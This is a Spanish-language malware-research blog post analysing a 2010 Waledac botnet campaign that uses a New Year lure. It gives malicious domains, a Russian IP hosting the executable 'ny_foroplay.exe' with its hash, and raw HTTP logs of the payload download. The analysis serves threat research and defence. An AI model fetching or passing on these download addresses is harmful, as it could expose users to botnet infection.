Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

viernes, 1 de enero de 2010

Waledac vuelve con otra estrategia de ataque

Luego de un largo periodo de inactividad, la botnet formada por waledac vuelve a desplegar una estrategia de infección utilizando el patrón que lo caracteriza: Ingeniería Social, que en esta oportunidad aprovecha como cobertura el comienzo del nuevo año.

Las últimas campañas de waledac datan de mediados de año cuando la estrategia de propagación utilizada simulaba ser un video sobre el día de la independencia en EE.UU, alojado en YouTube. De hecho, la actividad más importante durante este año se produjo durante el primer cuatrimestre.

A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.

Sin embargo, quienes se encuentran detrás de waledac nunca se detuvieron y los dominios utilizados recientemente poseen fecha de registro durante todo el periodo de supuesta inactividad.

Cada página utilizada para la propagación posee un script ofuscado con instrucciones para ser ejecutadas de forma automática en el equipo víctima. De esta manera, se explota una debilidad y automáticamente se descarga y ejecuta el malware, convirtiendo el equipo en un nodo más de la botnet, para continuar con sus actividades fraudulentas. A continuación vemos una captura del script.

Dentro del script se encuentra la referencia hacia el archivo counter.php que aloja otro script y desde el cual salta hacia http://diokxbgrqkgg.com/ld/trest1/ y este a http://diokxbgrqkgg.com/nte/trest1.py, en donde se encuentra otro script malicioso.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html


En esta instancia, descarga y ejecuta un archivo llamado "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) desde la dirección IP 95.169.190.208 alojada en Rusia.

Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac ha vuelto con una nueva excusa, aunque a juzgar por el porcentaje de actividad que posee el servidor donde se encuentra alojado, todo indica que siempre se mantuvo latente con actividades muy esporádicas. Incluso, teniendo en cuenta la estructura de carpetas desde la cual se descarga, parecería haber una relación directa con otra amenaza bastante conocido que es Bredolab, y a la cual aparentemente también asocian con algunos scareware y ZeuS.

Información relacionada
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más